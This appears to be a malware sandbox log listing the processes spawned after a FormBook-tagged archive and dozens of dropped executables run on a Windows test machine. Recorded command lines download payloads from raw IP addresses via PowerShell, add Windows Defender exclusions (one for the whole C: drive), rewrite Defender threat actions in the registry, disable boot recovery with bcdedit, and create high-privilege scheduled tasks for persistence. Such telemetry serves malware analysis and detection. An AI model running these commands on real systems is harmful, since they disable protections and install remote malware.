Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9ff97ab58,0x7ff9ff97ab68,0x7ff9ff97ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4340 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4768 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4968 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3272 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Users\Admin\Desktop\New Text Document.exe

"C:\Users\Admin\Desktop\New Text Document.exe"

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Users\Admin\Desktop\a\Zinker.exe

"C:\Users\Admin\Desktop\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

"C:\Users\Admin\Desktop\a\smartsoftsignew.exe"

C:\Users\Admin\Desktop\a\ADServices.exe

"C:\Users\Admin\Desktop\a\ADServices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\Desktop\a\New.exe

"C:\Users\Admin\Desktop\a\New.exe"

C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x40,0x12c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 640 -ip 640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 312

C:\Users\Admin\Desktop\a\GTA_V.exe

"C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Users\Admin\Desktop\a\CapSimple.exe

"C:\Users\Admin\Desktop\a\CapSimple.exe"

C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp" /SL5="$130258,18247052,1148416,C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Users\Admin\Desktop\a\RambledMimets.exe

"C:\Users\Admin\Desktop\a\RambledMimets.exe"

C:\Users\Admin\Desktop\a\ld.exe

"C:\Users\Admin\Desktop\a\ld.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

C:\Users\Admin\Desktop\a\MSiedge.exe

"C:\Users\Admin\Desktop\a\MSiedge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled no

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5168 -ip 5168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5168 -ip 5168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1596

C:\Users\Admin\Desktop\a\victor.exe

"C:\Users\Admin\Desktop\a\victor.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5060 -ip 5060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 232

C:\Users\Admin\Desktop\a\RambledMime.exe

"C:\Users\Admin\Desktop\a\RambledMime.exe"

C:\Users\Admin\Desktop\a\current.exe

"C:\Users\Admin\Desktop\a\current.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\host_so.exe

"C:\Users\Admin\Desktop\a\host_so.exe"

C:\Users\Admin\Desktop\a\mixinte.exe

"C:\Users\Admin\Desktop\a\mixinte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\inte.exe

"C:\Users\Admin\Desktop\a\inte.exe"

C:\Users\Admin\Desktop\a\winlogon.exe

"C:\Users\Admin\Desktop\a\winlogon.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe

"C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7420 -ip 7420

C:\Users\Admin\Desktop\a\setup.exe

"C:\Users\Admin\Desktop\a\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7420 -s 684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\file300un.exe

"C:\Users\Admin\Desktop\a\file300un.exe"

C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe

"C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe"

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\buildjudit.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Users\Admin\Desktop\a\lumma1234.exe

"C:\Users\Admin\Desktop\a\lumma1234.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\Desktop\a\go.exe

"C:\Users\Admin\Desktop\a\go.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\random.exe

"C:\Users\Admin\Desktop\a\random.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Users\Admin\Desktop\a\33333.exe

"C:\Users\Admin\Desktop\a\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe

"C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe"

C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe

"C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe" /s

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe

"C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\Desktop\a\lenin.exe

"C:\Users\Admin\Desktop\a\lenin.exe"

C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe

"C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe"

C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe

"C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5676 -ip 5676

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 272

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

